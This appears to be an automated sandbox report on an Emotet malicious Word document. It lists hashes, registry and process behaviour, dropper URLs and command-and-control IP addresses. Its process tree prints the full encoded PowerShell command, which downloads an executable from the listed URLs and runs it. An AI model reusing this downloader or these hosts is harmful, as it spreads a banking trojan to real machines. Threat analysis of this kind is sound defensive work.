emotet | 17c68efb5139dd5e1cd67aec86fd75f5f22885a5a45b8d6951e999a5967e4a54

Analysis

max time kernel
60s
max time network
27s
platform
windows7_x64
resource
win7v200213
submitted
14-02-2020 08:11

Sharing

Copy URL

Twitter E-mail

General

Target

17c68efb5139dd5e1cd67aec86fd75f5f22885a5a45b8d6951e999a5967e4a54.doc
Size

235KB
MD5

b91830b586026b91af49a624d0df0605
SHA1

3bdc4fe304c2c0642ccb0189c34ed20b91a80685
SHA256

17c68efb5139dd5e1cd67aec86fd75f5f22885a5a45b8d6951e999a5967e4a54
SHA512

b0761cc64aa420d24062e1d899b86c84c809445d6b8389264eee31f3cbcc57ba9d6008650bc636791551eabb319cc5c330f514f194221965d5c7366e6cf41fb4

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://ta-behesht.ir/images/Provx00a/

exe.dropper

http://tatcogroup.ir/wp-admin/UC/

exe.dropper

http://tcpartner.ru/wp-includes/nr8/

exe.dropper

http://tepcian.utcc.ac.th/wp-admin/SquR/

exe.dropper

http://ourproductreview.in/pokjbg746ihrtr/a1kzwc/

Extracted

Family

emotet

71.126.247.90:80

98.239.119.52:80

80.86.91.91:8080

104.236.28.47:8080

47.155.214.239:443

180.92.239.110:8080

87.106.136.232:8080

76.104.80.47:80

173.16.62.227:80

92.222.216.44:8080

47.153.183.211:80

74.130.83.133:80

47.156.70.145:80

110.36.217.66:8080

160.16.215.66:8080

200.116.145.225:443

181.13.24.82:80

24.94.237.248:80

5.32.55.214:80

31.172.240.91:8080

rsa_pubkey.plain

Signatures

Suspicious behavior: EmotetMutantsSpam 2 IoCs

Processes:

879.exewextract.exe

pid process

1052 879.exe
1520 wextract.exe

pid	process
1052	879.exe
1520	wextract.exe

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0FFDE287-ACD8-4275-998B-918CD92A006B}\2.0\HELPDIR	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\TypeLib\{0FFDE287-ACD8-4275-998B-918CD92A006B}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\TypeLib\{0FFDE287-ACD8-4275-998B-918CD92A006B}\2.0\FLAGS	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0FFDE287-ACD8-4275-998B-918CD92A006B}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\TypeLib	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0FFDE287-ACD8-4275-998B-918CD92A006B}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\TypeLib\{0FFDE287-ACD8-4275-998B-918CD92A006B}\2.0\0	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	WINWORD.EXE

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1988 WINWORD.EXE
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1368 848 powersheLL.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powersheLL.exewextract.exe

pid process

1368 powersheLL.exe
1368 powersheLL.exe
1520 wextract.exe
1520 wextract.exe
Blacklisted process makes network request 1 IoCs

Processes:

powersheLL.exe

flow pid process

2 1368 powersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

879.exewextract.exe

pid process

1052 879.exe
1520 wextract.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXE879.exewextract.exe

pid process

1988 WINWORD.EXE
1988 WINWORD.EXE
1052 879.exe
1520 wextract.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 1368 powersheLL.exe

pid	process
1988	WINWORD.EXE

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1368	848	powersheLL.exe

pid	process
1368	powersheLL.exe
1368	powersheLL.exe
1520	wextract.exe
1520	wextract.exe

flow	pid	process
2	1368	powersheLL.exe

pid	process
1052	879.exe
1520	wextract.exe

pid	process
1988	WINWORD.EXE
1988	WINWORD.EXE
1052	879.exe
1520	wextract.exe

description	pid	process
Token: SeDebugPrivilege	1368	powersheLL.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

879.exe

description	pid	process	target process
PID 1052 wrote to memory of 1520	1052	879.exe	wextract.exe
PID 1052 wrote to memory of 1520	1052	879.exe	wextract.exe
PID 1052 wrote to memory of 1520	1052	879.exe	wextract.exe
PID 1052 wrote to memory of 1520	1052	879.exe	wextract.exe

Office loads VBA resources, possible macro or embedded object present

Drops file in System32 directory 2 IoCs

Processes:

powersheLL.exe879.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe
File renamed	C:\Users\Admin\879.exe => C:\Windows\SysWOW64\wextract\wextract.exe	879.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\17c68efb5139dd5e1cd67aec86fd75f5f22885a5a45b8d6951e999a5967e4a54.doc"
1⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1988

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AHEAaABsAHkAJwA7ACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBhAHoAYwB5AGoAdABiAHQAYgBoAHcAagArACcALgBlAHgAZQAnADsAJABXAGkAaABpAGoAawBiAGQAbABsAHIAPQAnAFYAbQBuAHEAcQBrAG0AaABrAGYAdgB4ACcAOwAkAEsAcQB2AGYAbwB4AHkAcABlAHoAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAYwBMAEkARQBOAFQAOwAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAPQAnAGgAdAB0AHAAOgAvAC8AdABhAC0AYgBlAGgAZQBzAGgAdAAuAGkAcgAvAGkAbQBhAGcAZQBzAC8AUAByAG8AdgB4ADAAMABhAC8AKgBoAHQAdABwADoALwAvAHQAYQB0AGMAbwBnAHIAbwB1AHAALgBpAHIALwB3AHAALQBhAGQAbQBpAG4ALwBVAEMALwAqAGgAdAB0AHAAOgAvAC8AdABjAHAAYQByAHQAbgBlAHIALgByAHUALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBuAHIAOAAvACoAaAB0AHQAcAA6AC8ALwB0AGUAcABjAGkAYQBuAC4AdQB0AGMAYwAuAGEAYwAuAHQAaAAvAHcAcAAtAGEAZABtAGkAbgAvAFMAcQB1AFIALwAqAGgAdAB0AHAAOgAvAC8AbwB1AHIAcAByAG8AZAB1AGMAdAByAGUAdgBpAGUAdwAuAGkAbgAvAHAAbwBrAGoAYgBnADcANAA2AGkAaAByAHQAcgAvAGEAMQBrAHoAdwBjAC8AJwAuACIAcwBQAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAHIAeQBuAGkAaABxAHgAYwBxAG4AcAA9ACcASABrAGQAawB6AGgAegBrAGMAcgB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAGgAaQBwAHMAdgB3AHAAIABpAG4AIAAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAKQB7AHQAcgB5AHsAJABLAHEAdgBmAG8AeAB5AHAAZQB6AC4AIgBkAE8AdwBuAEwAYABPAGAAQQBEAEYASQBsAGUAIgAoACQAWABoAGkAcABzAHYAdwBwACwAIAAkAEQAagBhAGEAbwB1AHMAdwBuAGIAcgBoAHkAKQA7ACQASgBtAGMAbABrAGoAcQBwAD0AJwBYAGkAaQBhAHgAawB3AGMAYQB3ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADMANwA0ADMAMgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAFQAZQAiACgAJABEAGoAYQBhAG8AdQBzAHcAbgBiAHIAaAB5ACkAOwAkAEMAawB4AHMAdQBjAG8AaABzAHQAYwBoAGwAPQAnAEMAZwB4AGEAdgB4AGYAYgByACcAOwBiAHIAZQBhAGsAOwAkAFoAZwBvAHYAcgBoAGoAbQA9ACcATQBxAHYAbgB4AGYAZgBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AbAByAHoAdAB6AHYAZQBjAHcAagBnAD0AJwBDAGkAcwB3AGMAdgB4AHkAegBlAHEAcQAnAA==
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Drops file in System32 directory
PID:1368

C:\Users\Admin\879.exe
C:\Users\Admin\879.exe
1⤵
- Suspicious behavior: EmotetMutantsSpam
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
PID:1052

C:\Windows\SysWOW64\wextract\wextract.exe
"C:\Windows\SysWOW64\wextract\wextract.exe"
2⤵
- Suspicious behavior: EmotetMutantsSpam
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1520

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\879.exe

Download Submit
C:\Users\Admin\879.exe

Download Submit
C:\Windows\SysWOW64\wextract\wextract.exe

Download Submit
memory/1052-189-0x00000000003F0000-0x00000000003FC000-memory.dmp

Filesize
48KB

Download
memory/1052-190-0x0000000000400000-0x00000000004F7000-memory.dmp

Filesize
988KB

Download
memory/1520-193-0x0000000000400000-0x00000000004F7000-memory.dmp

Filesize
988KB

Download
memory/1520-192-0x0000000000370000-0x000000000037C000-memory.dmp

Filesize
48KB

Download
memory/1988-81-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-11-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-5-0x000000000AF90000-0x000000000AF94000-memory.dmp

Filesize
16KB

Download
memory/1988-6-0x000000000C010000-0x000000000C014000-memory.dmp

Filesize
16KB

Download
memory/1988-7-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-9-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-10-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-89-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-12-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-14-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-16-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-18-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-20-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-22-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-24-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-26-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-28-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-30-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-32-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-34-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-36-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-38-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-40-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-42-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-44-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-46-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-48-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-49-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-50-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-51-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-52-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-53-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-55-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-57-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-59-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-61-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-63-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-65-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-67-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-69-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-71-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-73-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-75-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-77-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-79-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-3-0x00000000070D0000-0x00000000072D0000-memory.dmp

Filesize
2.0MB

Download
memory/1988-83-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-85-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-131-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-4-0x00000000070D0000-0x00000000072D0000-memory.dmp

Filesize
2.0MB

Download
memory/1988-111-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-93-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-95-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-97-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-99-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-101-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-103-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-105-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-107-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-109-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-91-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-113-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-115-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-117-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-119-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-121-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-123-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-125-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-127-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-129-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-87-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-133-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-135-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-137-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-139-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-141-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1988-143-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
